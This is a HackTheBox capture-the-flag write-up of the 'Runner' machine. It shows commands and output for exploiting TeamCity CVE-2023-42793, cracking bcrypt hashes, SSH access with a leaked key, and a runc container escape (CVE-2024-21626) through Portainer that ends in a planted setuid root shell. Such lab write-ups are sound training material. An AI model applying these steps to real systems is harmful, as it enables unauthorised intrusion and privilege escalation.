Runner

Recon

HTTP (80)

Port 80 seems to be server hosting services:

Directory/subdomain enumeration came empty handed. The common CI/CD pipeline software we have seen if TeamCity which isn't included in wordlists so I tried it manually:

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Runner]
└─$ curl runner.htb -H 'Host: teamcity.runner.htb' -i
HTTP/1.1 401
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 27 May 2024 14:09:42 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
TeamCity-Node-Id: MAIN_SERVER
WWW-Authenticate: Basic realm="TeamCity"
WWW-Authenticate: Bearer realm="TeamCity"
Cache-Control: no-store

Authentication required
To login manually go to "/login.html" page

TeamCity

We need credentials for login...

Under login we see version number and quick google leads us to CVE: https://github.com/Zyad-Elsayed/CVE-2023-42793

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Runner]
└─$ py CVE-2023-42793/CVE-2023-42793.py -u http://teamcity.runner.htb
[+] http://teamcity.runner.htb/login.html [H454NSec1037:@H454NSec]

There are no Agents that can do pipelines for us so there's no point in creating project and trying to setup pipeline for RCE.

Let's get backup for config files or interesting files:

Hashes found?

➜ cat .\hashes
$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em

➜ .\hashcat.exe --show .\hashes
The following 4 hash-modes match the structure of your input hash:

      # | Name                                                       | Category
  ======+============================================================+======================================
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
  25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
  28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=rockyou.txt --format=bcrypt .\hashes
...
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em:piper123

Looks like we also have id_rsa key:

SSH (22)

[[Labs/HackTheBox/Seasonal/Season 5/Runner/id_rsa|id_rsa]]

Verify owner:

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Runner]
└─$ ssh-keygen -l -f id_rsa
3072 SHA256:YBrlVeYeOPwQhNizkxaVtrtBTlLZ2/T5XBekbmDbEL4 john@runner (RSA)

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Runner]
└─$ ssh john@runner.htb -i id_rsa

No password.. hmm... It's still a good idea to know it.

User.txt

john@runner:~$ cat user.txt
06994b1d5849190310fc4e41f9b6a034

Privilege Escalation

We only managed to get mattew's password, but where can we use it? su doesn't work.

john@runner:~$ ss -tlpn4
State       Recv-Q      Send-Q           Local Address:Port           Peer Address:Port     Process
LISTEN      0           4096             127.0.0.53%lo:53                  0.0.0.0:*
LISTEN      0           4096                 127.0.0.1:8111                0.0.0.0:*
LISTEN      0           4096                 127.0.0.1:9443                0.0.0.0:*
LISTEN      0           4096                 127.0.0.1:5005                0.0.0.0:*
LISTEN      0           4096                 127.0.0.1:9000                0.0.0.0:*
LISTEN      0           511                    0.0.0.0:80                  0.0.0.0:*
LISTEN      0           128                    0.0.0.0:22                  0.0.0.0:*

We have few applications running, we know 8111 is TeamCity, but what are others?

Portainer is running on 9000 and 9433 is probably HTTPs version of it. 5005 seems unresponsive to http and netcat shows nothing.

john@runner:/data$ find / -name '*portainer*' -ls 2>/dev/null
     1042      0 lrwxrwxrwx   1 root     root           32 May 27 13:50 /run/systemd/units/invocation:portainer.service -> e4d709e3c81d4bd489261b0b325c9f25
    61374      0 lrwxrwxrwx   1 root     root           37 Feb 28 07:57 /etc/systemd/system/multi-user.target.wants/portainer.service -> /etc/systemd/system/portainer.service
    61382      4 -rw-r--r--   1 root     root          276 Feb 28 20:25 /etc/systemd/system/portainer.service
    61576      0 lrwxrwxrwx   1 root     root           36 Feb 28 20:31 /etc/nginx/sites-enabled/portainer -> /etc/nginx/sites-available/portainer
    62184      4 -rw-r--r--   1 root     root          352 Feb 28 22:24 /etc/nginx/sites-available/portainer
   393229     88 -rw-------   1 root     root       131072 May 27 14:55 /data/portainer.db
   393232      4 -rw-------   1 root     root          227 Feb 28 07:51 /data/portainer.key
   393233      4 -rw-------   1 root     root          190 Feb 28 07:51 /data/portainer.pub
     1039      4 drwxr-xr-x   4 root     docker       4096 Apr  4 10:24 /opt/portainer
     1579  49924 -rwxr-xr-x   1 root     docker   51122176 Dec  7 08:15 /opt/portainer/portainer
     3094      0 drwxr-xr-x   2 root     root            0 May 27 13:50 /sys/fs/cgroup/system.slice/portainer.service
john@runner:/data$ cd /opt/portainer/
john@runner:/opt/portainer$ ls -l
total 252236
-rwxr-xr-x 1 root docker 48047088 Dec  7 08:15 docker
-rwxr-xr-x 1 root docker 60470973 Dec  7 08:15 docker-compose
-rwxr-xr-x 1 root docker 50597888 Dec  7 08:15 helm
-rwxr-xr-x 1 root docker 48037888 Dec  7 08:15 kubectl
drwxr-xr-x 2 root docker     4096 Apr  4 10:24 mustache-templates
-rwxr-xr-x 1 root docker 51122176 Dec  7 08:15 portainer
drwxr-xr-x 3 root docker     4096 Apr  4 10:24 public
john@runner:/opt/portainer$ ls public/
060b2710bdbbe3dfe48b.svg  51906a7e4bd0e1d9e771.png  9d07a3ace464cfd6e27c.png  main.712d6f30396f42406a3d.js              runtime.942fa683274b3d3c26cf.js      vendor.c6c227160a59d929ec43.js
112a479c093f4729251d.png  63a301f0574f1a696ce6.png  c2c179f41199d25e0055.png  main.712d6f30396f42406a3d.js.LICENSE.txt  runtime.942fa683274b3d3c26cf.js.map  vendor.c6c227160a59d929ec43.js.LICENSE.txt
19c2b168a8d85994e14e.png  63c1259abd88a9d2cebc.svg  d3a18c5002453f58c8b9.png  main.712d6f30396f42406a3d.js.map          timeout.html                         vendor.c6c227160a59d929ec43.js.map
2b3c7053dcd54989a6f5.png  6d50eaeb9f128c130ed9.xml  index.html                main.7d6053e1c574421c1788.css             vendor.b4533442c1cbb18b98a1.css
2dcfc527d067d4ae3424.png  7e697c5bab4f819328df.svg  locales                   main.7d6053e1c574421c1788.css.map         vendor.b4533442c1cbb18b98a1.css.map

It seems we have a build version and probably only way to interact with it is to port forward it.

└─$ ssh john@runner.htb -i id_rsa -L 9000:127.0.0.1:9000

Using credentials matthew:piper123 we are able to login.

-> Googling docker escape cve -> https://medium.com/@sk3pper/play-with-cve-2024-21626-2b4377e9577f -> https://github.com/NitroCao/CVE-2024-21626

primary page:

Available images:

Create new container:

It kept complaining about /proc/self/fd/8 for about 300 millisecond and shut down right away.

It worked with /proc/self/fd/7, but after some time 8 also worked? I guess build step failed or something on previous:

shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@67ab15dc91e3:.# ls /root
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@67ab15dc91e3:.# ls ../../../../../../../../../root
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
docker_clean.sh  initial_state.txt  monitor.sh  root.txt
root@67ab15dc91e3:.# cd ../../../../../../../../../root
chdir: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@67ab15dc91e3:../../../../../../../../../root# ls
docker_clean.sh  initial_state.txt  monitor.sh  root.txt
root@67ab15dc91e3:../../../../../../../../../root# cat root.txt
3d236479467eb9441598807fe1965163
root@67ab15dc91e3:../../../../../../../../../root# cp /bin/sh ../tmp/rootsh && chmod 4777 ../tmp/rootsh

Writeup referenced:https://blog.taipanbyte.ru/hackthebox/Runner-HTB-Writeup

PreviousMailing NextSolarLab

Last updated 7 months ago

hashtagRecon

hashtagHTTP (80)

hashtagTeamCity

hashtagSSH (22)

hashtagUser.txt

hashtagPrivilege Escalation